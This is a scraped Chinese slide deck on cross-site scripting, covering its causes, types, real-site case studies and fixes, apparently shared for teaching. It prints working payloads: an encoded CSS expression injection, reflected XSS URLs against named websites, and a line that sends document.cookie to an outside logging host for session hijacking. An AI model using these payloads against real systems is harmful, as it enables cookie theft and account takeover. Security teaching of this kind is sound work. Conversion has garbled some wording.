16 元
下载资源

跨站脚本漏洞分享

上传人:e****s 文档编号:242043200 上传时间:2024-08-11 格式:PPT 页数:24 大小:624KB
返回 下载 相关 举报
跨站脚本漏洞分享_第1页
第1页 / 共24页
跨站脚本漏洞分享_第2页
第2页 / 共24页
跨站脚本漏洞分享_第3页
第3页 / 共24页
点击查看更多>>
资源描述
Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,*,跨站脚本漏洞分享,盛大在线:徐江涛,博客:,5,、总结,&,提问,跨站脚本漏洞,1,、,跨站脚本漏洞原理及其危害,2,、跨站脚本漏洞分类,3,、跨站脚本漏洞及案例,4,、跨站脚本漏洞修补建议,Cross site scripting 简称 XSS,原理:,利用网站的漏洞向网站的页面注入JAVASCRIPT等脚本内容。,根源:程序的输入、输出没有考虑平安因素。,跨站脚本漏洞原理及其危害,XSS Cheat Sheet,了解不同浏览器和各种特殊的,HTML,标签如何执行脚本。,XSS,需要使用的关键字,;!-=&(),各类伪协议头:,Javascript:vbscript:,跨站脚本漏洞原理及其危害,CSS,样式表脚本注入,style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46,120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,125),expression,变形。,Expression,实际内容,if(window.x!=1)alert(xss);window.x=1;,跨站脚本漏洞原理及其危害,挂马,插入恶意的脚本内容,运行病毒、木马。,钓鱼,篡改网页内容,骗取账号、密码等诈骗行为。,劫持会话,读取会话,COOKIE,传送给第三方劫持身份。,XSS Worm,使用,AJAX,技术,做几何趋势的增长传播。,跨站脚本漏洞原理及其危害,非持久型,XSS,需要从,URL,传参,点击链接触发。,持久型,XSS,XSS,内容已存储到数据库,写到固定页面。,DOM XSS,JAVASCRIPT,处理数据输出出现漏洞。,浏览器的漏洞造成的,XSS,跨站脚本漏洞原理及其危害,表单值容易出现,XSS,搜索框、信息提示、个人资料、友情链接、背景图片等等。,各类表单值、隐藏的表单值都很危险。,跨站脚本漏洞及案例,案例,跨站脚本漏洞及案例,初级,中级,高级,搜索结果代码,:/speak2me/index.php/Lessons/index/key/%22%3E%3Cbody%20onload%3Dalert(document.cookie)%3E%3C%22/x/39/y/10/,非持久,XSS,过滤了反斜杠,/,跨站脚本漏洞及案例,HTML,代码,:,:/,持久,XSS,跨站脚本漏洞及案例,劫持会话,攻击代码,var img=new Image();img.src=:/xss.paitoubing/log.php?c=+document.cookie+,118,97,114,32,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,112,97,105,116,111,117,98,105,110,103,46,99,110,46,99,110,47,108,111,103,46,112,104,112,63,99,61,39,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,39,34,unicode,转换成,10,进制编码,跨站脚本漏洞及案例,前端验证了非法字符,这样就平安了吗?,跨站脚本漏洞及案例,通过,GET,方法跳过前端,:/group.wealink /groups/search?keyword=%22%3E%3Cbody%20onload=alert(1)%3E%3C%22,跨站脚本漏洞及案例,通过,PHP,函数,strip_tags,去掉字符串中包含的任何,HTML,及,PHP,的标记字符串,无懈可击?,跨站脚本漏洞及案例,照样篡改网页,真悲剧,未过滤、粗心大意平安隐患,跨站脚本漏洞及案例,这个图、很熟悉吧,其实这是一个通知、不是过滤,看图不说话、你懂的,高级案例,劫持会话,记录会话,模拟登录,发送,xss,给好友,删除个人信息,跨站蠕虫流程图,高级案例,记录会话,PHP,实例代码,&,=,=/需要翻开引号参数,=,跨站脚本漏洞修补建议,使用qsafehtml平安类,UBB平安类,富文本平安类,跨站脚本漏洞修补建议,跨站脚本漏洞和Web应用紧密相关,同时又涉及到客户端浏览器的平安特性。,Web平安已经不是单一的程序输出输出问题,必须从效劳端、客户端、应用多方面考虑。,跨站脚本漏洞修补建议,Thank you,
展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 商业管理 > 商业计划


copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!